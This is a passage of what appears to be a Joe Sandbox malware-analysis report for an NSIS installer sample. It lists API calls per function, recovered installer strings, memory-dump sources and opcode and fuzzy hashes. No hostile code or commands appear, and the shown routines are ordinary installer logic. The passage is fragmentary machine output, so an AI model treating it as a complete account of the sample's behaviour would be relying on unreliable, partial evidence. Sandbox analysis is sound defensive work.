                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B6C
                                                            • Part of subcall function 00405BBB: GetDlgItemTextW.USER32(?,?,00000400,00404BA3), ref: 00405BCE
                                                            • Part of subcall function 00406825: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                            • Part of subcall function 00406825: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                            • Part of subcall function 00406825: CharNextW.USER32(?,0043F000,74DF3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                            • Part of subcall function 00406825: CharPrevW.USER32(?,?,74DF3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                          • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C2F
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C4A
                                                            • Part of subcall function 00404DA3: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E44
                                                            • Part of subcall function 00404DA3: wsprintfW.USER32 ref: 00404E4D
                                                            • Part of subcall function 00404DA3: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E60
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A
                                                          • API String ID: 2624150263-3554254475
                                                          • Opcode ID: 716f91307e0c0206c4811f73cf3aa40f2f43fcc6cf09981b0470e9a043fb6368
                                                          • Instruction ID: 819d6111372f9eb468737b2dc9595d459319e5efb98401d1644bfd8e85b56d65
                                                          • Opcode Fuzzy Hash: 716f91307e0c0206c4811f73cf3aa40f2f43fcc6cf09981b0470e9a043fb6368
                                                          • Instruction Fuzzy Hash: 14A180B1901208ABDB11EFA5DD45BAFB7B8EF84314F11803BF601B62D1D77C9A418B69
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004030B3
                                                          • GetModuleFileNameW.KERNEL32(00000000,00442800,00000400), ref: 004030CF
                                                            • Part of subcall function 00406067: GetFileAttributesW.KERNEL32(00000003,004030E2,00442800,80000000,00000003), ref: 0040606B
                                                            • Part of subcall function 00406067: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040608D
                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,00440800,00440800,00442800,00442800,80000000,00000003), ref: 0040311B
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00403251
                                                          Strings
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403278
                                                          • Error launching installer, xrefs: 004030F2
                                                          • Inst, xrefs: 00403187
                                                          • soft, xrefs: 00403190
                                                          • Null, xrefs: 00403199
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-527102705
                                                          • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                          • Instruction ID: 55eb758a8cc994b5b8f5e8324c308f37a69edd03a8198e206d37cac48cd63750
                                                          • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                                          • Instruction Fuzzy Hash: E9519171900204AFDB209FA5DD86B9E7EACEB09356F20417BF504B62D1C7789F408BAD
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(004326A0,00000400), ref: 004066D6
                                                          • GetWindowsDirectoryW.KERNEL32(004326A0,00000400,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 004066EC
                                                          • SHGetPathFromIDListW.SHELL32(00000000,004326A0), ref: 0040674A
                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406753
                                                          • lstrcatW.KERNEL32(004326A0,\Microsoft\Internet Explorer\Quick Launch,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 0040677E
                                                          • lstrlenW.KERNEL32(004326A0,00000000,0042BA48,?,?,00000000,00000000,?,74DF23A0), ref: 004067D8
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion, xrefs: 004066A7
                                                          • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406778
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 4024019347-730719616
                                                          • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                          • Instruction ID: fc4c1bf1ff31ba1b34cdfc75387d7881e57296f2874843d1a5ebc397bafcf832
                                                          • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                                          • Instruction Fuzzy Hash: D16135716042009BD720AF24DD80B6B76E8EF85328F12453FF647B32D0DB7D9961865E
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CountTick$wsprintf
                                                          • String ID: *B$ A$ A$... %d%%
                                                          • API String ID: 551687249-3485722521
                                                          • Opcode ID: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
                                                          • Instruction ID: 3a086bfa1ae904988031f2e91e2ff9394e13111a018eeb379290de00703e2b75
                                                          • Opcode Fuzzy Hash: 6d935c58c9c1f66a15f185bc6e4e505f3dabe6c18ce33db7fed369594a7e0453
                                                          • Instruction Fuzzy Hash: 2F519F71900219DBCB11DF65DA44B9E7FB8AF44766F10413BE810BB2D1C7789A40CBA9
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040457A
                                                          • GetSysColor.USER32(00000000), ref: 004045B8
                                                          • SetTextColor.GDI32(?,00000000), ref: 004045C4
                                                          • SetBkMode.GDI32(?,?), ref: 004045D0
                                                          • GetSysColor.USER32(?), ref: 004045E3
                                                          • SetBkColor.GDI32(?,?), ref: 004045F3
                                                          • DeleteObject.GDI32(?), ref: 0040460D
                                                          • CreateBrushIndirect.GDI32(?), ref: 00404617
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                          • Instruction ID: 3bf72a8e0ffa46ee4049c610ab3cabbd6d50cfb344f29d4a8179c655b9565abb
                                                          • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                          • Instruction Fuzzy Hash: 5C2165B1500B04ABC7319F38DE08B577BF4AF41715F04892EEA96A26E0D739D944CB54
                                                          APIs
                                                          • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                            • Part of subcall function 00406148: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040615E
                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                          • String ID: 9
                                                          • API String ID: 163830602-2366072709
                                                          • Opcode ID: e6852b5c5fbfd8bc876860f3b14f1bcaed0b753dd9a04d4db6e12186382bd870
                                                          • Instruction ID: d1aefac9689752b6b3ea6a4f87dd4281ecbe68d6f3974aa7f4e2ef829afcd0bd
                                                          • Opcode Fuzzy Hash: e6852b5c5fbfd8bc876860f3b14f1bcaed0b753dd9a04d4db6e12186382bd870
                                                          • Instruction Fuzzy Hash: 66510C75D04119AADF20EFD4CA85AAEBBB9FF44304F14817BE501B62D0D7B89D828B58
                                                          APIs
                                                          • lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                          • lstrlenW.KERNEL32(0040343D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                          • lstrcatW.KERNEL32(0042BA48,0040343D,0040343D,0042BA48,00000000,?,74DF23A0), ref: 00405657
                                                          • SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405669
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2531174081-0
                                                          • Opcode ID: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                          • Instruction ID: 60923f6e922cea494a698f26c75bee70e53a21f42b4b77269416c2a585f1ce57
                                                          • Opcode Fuzzy Hash: 7a9b63bfacfea3e7ee08c26d0c930c27eafc8712a75251909ef17a9a102c325c
                                                          • Instruction Fuzzy Hash: 9A21A171900258BACB119FA5ED449DFBFB4EF45310F50843AF908B22A0C3794A40CFA8
                                                          APIs
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404ECC
                                                          • GetMessagePos.USER32 ref: 00404ED4
                                                          • ScreenToClient.USER32(?,?), ref: 00404EEE
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404F00
                                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404F26
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Message$Send$ClientScreen
                                                          • String ID: f
                                                          • API String ID: 41195575-1993550816
                                                          • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                          • Instruction ID: fe1e2a7802b6c51c8f018a14413b1ee553013da7dc16083b389f375565560bf3
                                                          • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                          • Instruction Fuzzy Hash: 20015E71900219BADB00DB94DD85BFEBBBCAF95711F10412BBB51B61D0C7B4AA418BA4
                                                          APIs
                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                          • MulDiv.KERNEL32(?,00000064,?), ref: 00403001
                                                          • wsprintfW.USER32 ref: 00403011
                                                          • SetWindowTextW.USER32(?,?), ref: 00403021
                                                          • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                          Strings
                                                          • verifying installer: %d%%, xrefs: 0040300B
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                          • String ID: verifying installer: %d%%
                                                          • API String ID: 1451636040-82062127
                                                          • Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                          • Instruction ID: de78d71e2fb772fb87643f85aa6fa794cb5f2d0f129fd79c7e15704eeb750e6f
                                                          • Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
                                                          • Instruction Fuzzy Hash: 85014F71640208BBEF209F60DD49FEE3B79AB04344F008039FA02B51D0DBB996559B59
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                          • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                          • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                          • String ID:
                                                          • API String ID: 2667972263-0
                                                          • Opcode ID: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
                                                          • Instruction ID: fd7949a1005e62e73a365a75524f2bbb059e9229dbd09bef2f8decdc6a7611be
                                                          • Opcode Fuzzy Hash: 12069ca59edc5e45febacc53791406d74f20a71b16248a4462b159327f362224
                                                          • Instruction Fuzzy Hash: FA31A271D00124BBCF21AFA5CE89D9E7E79AF45324F14423AF421762E1CB798D418FA8
                                                          APIs
                                                          • CharNextW.USER32(?,*?|<>/":,00000000,0043F000,74DF3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 00406888
                                                          • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406897
                                                          • CharNextW.USER32(?,0043F000,74DF3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 0040689C
                                                          • CharPrevW.USER32(?,?,74DF3420,00441800,00000000,0040352D,00441800,00441800,0040383C,?,00000008,0000000A,0000000C), ref: 004068AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: *?|<>/":
                                                          • API String ID: 589700163-165019052
                                                          • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                          • Instruction ID: bedb2e6347f460b6a244a356934bd0223db9426f0f89d28790e15ec7ef568a4f
                                                          • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                          • Instruction Fuzzy Hash: C911B66780221295DB303B148C40A7762A8AF59754F56C43FED86732C0E77C5C9282AD
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406912
                                                          • wsprintfW.USER32 ref: 0040694D
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406961
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                          • String ID: %s%S.dll$UXTHEME
                                                          • API String ID: 2200240437-1106614640
                                                          • Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                          • Instruction ID: 6d7bab0cfc2d48cbbbe6bb2f91b005b1c0391479526b60628745523d5c0137a7
                                                          • Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
                                                          • Instruction Fuzzy Hash: 66F02B71501129A7CF10AB68DD0EF9F376CAB00304F10447AA646F10E0EB7CDB69CB98
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017D5
                                                          • CompareFileTime.KERNEL32(-00000014,?,0040A5F0,0040A5F0,00000000,00000000,0040A5F0,00440000,?,?,00000031), ref: 004017FA
                                                            • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000,?), ref: 00405634
                                                            • Part of subcall function 004055FC: lstrlenW.KERNEL32(0040343D,0042BA48,00000000,?,74DF23A0,?,?,?,?,?,?,?,?,?,0040343D,00000000), ref: 00405644
                                                            • Part of subcall function 004055FC: lstrcatW.KERNEL32(0042BA48,0040343D,0040343D,0042BA48,00000000,?,74DF23A0), ref: 00405657
                                                            • Part of subcall function 004055FC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405669
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040568F
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004056A9
                                                            • Part of subcall function 004055FC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004056B7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID:
                                                          • API String ID: 1941528284-0
                                                          • Opcode ID: 99b6416810ddb5753ad8509ba94df8da2a36f778d9381ab1a10acee0bad54b07
                                                          • Instruction ID: 896c0c78208a39cbb5dd39340d0745d1a2bf2ace5f7797069eceb710e9101d93
                                                          • Opcode Fuzzy Hash: 99b6416810ddb5753ad8509ba94df8da2a36f778d9381ab1a10acee0bad54b07
                                                          • Instruction Fuzzy Hash: 4C41B671900108BACB117BB5DD85DBE7AB9EF45328F21423FF412B10E2D73C8A919A2D
                                                          APIs
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F22
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F6E
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F77
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F8E
                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F99
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: CloseEnum$DeleteValue
                                                          • String ID:
                                                          • API String ID: 1354259210-0
                                                          • Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                          • Instruction ID: 446d876c474c9d83549856ad9cac23e68bb7371358ae7480bd0e7fa7c4692e5e
                                                          • Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
                                                          • Instruction Fuzzy Hash: 1D212A7150010ABFDF129F90CE89EEF7A7DEB54388F110076B909B21E0E7B58E54AA64
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401DBF
                                                          • GetClientRect.USER32(?,?), ref: 00401E0A
                                                          • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E3A
                                                          • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E4E
                                                          • DeleteObject.GDI32(00000000), ref: 00401E5E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3567347614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3567334784.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567361105.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567387004.000000000040A000.00000008.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000004.00000002.3567409966.0000000000468000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_QNuQ5e175D.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                          • Instruction ID: c57303c31a56d7bc8f2a0c5af16d3cdd50a2ae23bf22298ce01a5789fd7b985b
                                                          • Opcode Fuzzy Hash: 81c9bb8771d2fff4a04963bae7b32cf8a9b6882c20dc3426dc9c78dd315e4f46
                                                          • Instruction Fuzzy Hash: B9211972900119AFCB05DF98DE45AEEBBB5EB08354F14003AFA45F62A0D7789D81DB98
                                                          APIs
                                                          • GetDC.USER32(?), ref: 00401E76
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
